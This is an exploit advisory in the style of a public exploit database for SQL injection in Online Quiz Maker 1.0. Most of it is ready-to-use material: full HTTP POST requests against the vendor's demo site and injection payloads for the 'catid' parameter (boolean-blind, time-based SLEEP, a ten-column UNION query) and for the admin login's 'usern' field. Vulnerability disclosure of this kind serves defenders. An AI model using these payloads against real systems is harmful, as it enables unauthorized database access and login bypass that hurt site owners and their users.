# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php
# Software Link:https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
 
# Description : An attacker can execute SQL commands through parameters
# that contain vulnerable.
# An authorized user can use the filtering feature and can fully authorize
# the database or other server informations. Also there are XSS
# vulnerabilities too.
 
# PoC : SQLi 1 :
# Request(POST):
 
POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
Host: www.hscripts.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
uname=test&catid=1
 
# Parameter: catid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: 
 
uname=test&catid=1 AND 4815=4815
 
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
 
uname=test&catid=1 AND SLEEP(5)
 
# Type: UNION query
# Title: Generic UNION query (NULL) - 10 columns
# Payload: 
 
uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR
 
# PoC : SQLi 2: Admin Login SQL Injection
# Request(POST):
 
POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
Host: www.hscripts.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://www.hscripts.com/scripts/php/quiz-system/admin/add-category.php
Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
usern=testing&passw=password&type=auth
 
# Parameter: usern (POST)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
 
usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth